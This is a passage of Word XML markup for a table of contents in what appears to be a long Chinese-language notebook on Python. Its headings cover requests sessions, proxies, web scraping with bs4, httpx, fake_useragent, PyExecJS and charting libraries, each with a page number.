              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780030 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>563</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57F1E898" w14:textId="77C7A7B0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780031" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>session</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780031 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>563</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7674F7AA" w14:textId="3B0C9630" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780032" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>实际案例：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>expDB</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>爬虫</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780032 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>565</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="004E3CE8" w14:textId="0D726A87" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780033" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>行为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780033 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>616</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54834568" w14:textId="6D437CD3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780034" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>chatGPT</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>回答</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780034 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>617</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B0A784E" w14:textId="3DBDB611" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780035" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>图形化：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PySimpleGUI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780035 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>618</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BB6222C" w14:textId="012B58DE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780036" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>图形化：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pyecharts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780036 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>618</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4549EA05" w14:textId="2665D0C8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780037" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>requests</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780037 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>618</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FA39B5B" w14:textId="341B49C0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780038" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>关闭报错</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780038 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>618</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="028BCE39" w14:textId="1D70323C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780039" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780039 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>619</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48732438" w14:textId="214C96EE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780040" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置一个有重试、重连、</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>retry</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>机制的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>session</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780040 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>619</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04414514" w14:textId="3B852B13" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780041" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>httpx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780041 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>621</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5703B461" w14:textId="390945D3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780042" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fake_useragent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780042 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>621</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="442BDC35" w14:textId="2E3AC91B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780043" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">PyExecJS:execjs </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>语言</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780043 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>622</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61ABB777" w14:textId="475DBDA4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780044" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bs4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780044 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>622</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13AA44BF" w14:textId="70CD991B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780045" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>div</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>等类属性选取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780045 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>622</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="061C182D" w14:textId="769CF973" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780046" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>css</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>选择器</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(selector)</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>选取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780046 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>623</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7ED82014" w14:textId="3CD4E415" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
